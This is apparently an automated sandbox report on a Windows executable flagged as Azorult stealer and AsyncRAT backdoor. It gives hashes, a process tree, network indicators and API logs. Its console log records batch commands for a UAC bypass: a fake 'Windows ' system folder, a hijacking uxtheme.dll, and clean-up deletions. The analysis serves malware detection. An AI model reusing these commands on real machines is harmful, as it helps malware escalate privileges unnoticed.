Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 22, 2021, 5:34 p.m.	March 22, 2021, 5:41 p.m.

Size	1.1MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b2c1396260a5bf7289fbd08cdb3cc96d`
SHA256	`1be887ab809f4d5f443d78ee02427954aaf63365be283fec335902ac48ba4445`
CRC32	`65CBF49E`
ssdeep	`12288:WimIXlguyh7oDAD/fFWpgMxxxfrHOHk2Nk6sY0WgLtpPYj8aqh+sam9E57rxE2AB:Fl2uypoDY1WPjxX5RY0dLtGjFbsiUN`
Yara	PE_Header_Zero - PE File Signature Zero IsPE32 - (no description) IsNET_EXE - (no description) IsWindowsGUI - (no description) IsPacked - Entropy Check HasOverlay - Overlay Check Win32_Trojan_PWS_Azorult_Net_1_Zero - Win32 Trojan PWS .NET Azorult Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

clr3.exe "C:\Users\test22\AppData\Local\Temp\clr3.exe"
4244
- clr3.exe "{path}"
  8620
  - srvs.exe "C:\Users\test22\AppData\Local\Temp\srvs.exe"
    1892
    - srvs.tmp "C:\Users\test22\AppData\Local\Temp\is-5IS72.tmp\srvs.tmp" /SL5="$3503F2,9285237,79360,C:\Users\test22\AppData\Local\Temp\srvs.exe"
      4420
      - cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\uacwev.bat""
        2424
        
        timeout.exe TIMEOUT /T 8
        2860
  - swnetwork.exe "C:\Users\test22\AppData\Local\Temp\swnetwork.exe"
    3100
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
bitbucket.org	A 104.192.141.1	104.192.141.1
bbuseruploads.s3.amazonaws.com	CNAME s3-1-w.amazonaws.com A 52.216.30.156	52.216.152.244
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.13.31

IP Address	Status	Action
104.192.141.1	Active	Moloch
104.26.13.31	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
185.153.198.36	Active	Moloch
52.216.30.156	Active	Moloch
74.119.193.164	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49811 -> 104.26.13.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49818 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49819 -> 52.216.30.156:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49832 -> 104.26.13.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.153.198.36:10202 -> 192.168.56.102:49810	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.153.198.36:10202 -> 192.168.56.102:49810	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.153.198.36:10202 -> 192.168.56.102:49810	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 74.119.193.164:3214 -> 192.168.56.102:49831	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49811 104.26.13.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e
TLS 1.2 192.168.56.102:49818 104.192.141.1:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org	4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0
TLS 1.2 192.168.56.102:49819 52.216.30.156:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2	C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=*.s3.amazonaws.com	90:e0:af:dc:fa:f7:0b:ac:50:bb:fa:43:e1:ec:e2:3d:ce:91:90:47
TLSv1 192.168.56.102:49832 104.26.13.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e

Queries for the computername (24 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 5:35 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 22, 2021, 5:34 p.m.			0	0
IsDebuggerPresent March 22, 2021, 5:34 p.m.			0	0
IsDebuggerPresent March 22, 2021, 5:35 p.m.			0	0
IsDebuggerPresent March 22, 2021, 5:35 p.m.			0	0
IsDebuggerPresent March 22, 2021, 5:35 p.m.			0	0
IsDebuggerPresent March 22, 2021, 5:35 p.m.			0	0
IsDebuggerPresent March 22, 2021, 5:35 p.m.			0	0

Command line console output was observed (38 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: mkdir console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: "\\?\C:\Windows " console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: mkdir console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: "\\?\C:\Windows \System32" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: copy console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: "C:\Windows\System32\PasswordOnWakeSettingFlyout.exe" "C:\Windows \System32\" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: copy console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: "uxtheme.dll" "C:\Windows \System32\" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: 1 file(s) copied. console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: "C:\Windows \System32\PasswordOnWakeSettingFlyout.exe" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: '"C:\Windows \System32\PasswordOnWakeSettingFlyout.exe"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x000000000000000b	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: echo console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: [-] UAC Bypassed ? console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: [-] UAC Bypassed ? console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: TIMEOUT console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: /T 8 console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: /s "C:\ProgramData\uxtheme.dll" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: Deleted file - C:\ProgramData\uxtheme.dll console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: /s "C:\ProgramData\pass.exe" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: Deleted file - C:\ProgramData\pass.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: C:\ProgramData> console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: "C:\ProgramData\uacwev.bat" console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: Waiting for 8 console_handle: 0x0000000000000007	1	1
WriteConsoleW March 22, 2021, 5:35 p.m.	buffer: seconds, press a key to continue ... console_handle: 0x0000000000000007	1	1

Uses Windows APIs to generate a cryptographic key (22 events)

Time & API	Arguments	Status	Return
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e32d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00587680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00587680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005874c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335548 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335548 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x057c58a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x057c58a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 5:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x057c56e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 22, 2021, 5:34 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

One or more processes crashed (21 events)

Time & API	Arguments	Status
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: 0xa959ea 0xa91c11 0xa91219 0xa910c8 0xa900c7 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6f5c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6f5c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6f651dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6f651e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6f651f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6f65416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7387f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa95a79 registers.esp: 2749032 registers.edi: 38863408 registers.eax: 0 registers.ebp: 2749056 registers.edx: 4941456 registers.ebx: 37167908 registers.esi: 38863976 registers.ecx: 0	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: 0x6b537df 0x6b534c9 0x6b5306b 0xa967f1 0xa91223 0xa910c8 0xa900c7 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6f5c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6f5c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6f651dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6f651e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6f651f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6f65416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7387f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 50 04 03 d1 b9 2e 4d bb 64 e8 a2 e0 8e f9 8b exception.instruction: mov edx, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6b54163 registers.esp: 2748500 registers.edi: 38712924 registers.eax: 0 registers.ebp: 2748560 registers.edx: 37805 registers.ebx: 38693336 registers.esi: 38712812 registers.ecx: 20	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: f3 aa 8b 45 f0 8b 4d 08 8b 55 10 03 c8 2b d0 52 exception.symbol: swnetwork+0xf088 exception.instruction: stosb byte ptr es:[edi], al exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61576 exception.address: 0x40f088 registers.esp: 1636996 registers.edi: 4350244 registers.eax: 0 registers.ebp: 1637012 registers.edx: 0 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 12	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4353968 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 507	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4358064 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 475	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4362160 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 443	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4366256 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 411	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4370352 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 379	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4374448 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 347	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4378544 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 315	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4382640 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 283	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4386736 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 251	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4390832 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 219	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4394928 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 187	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4399024 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 155	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4403120 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 123	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4407216 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 91	1
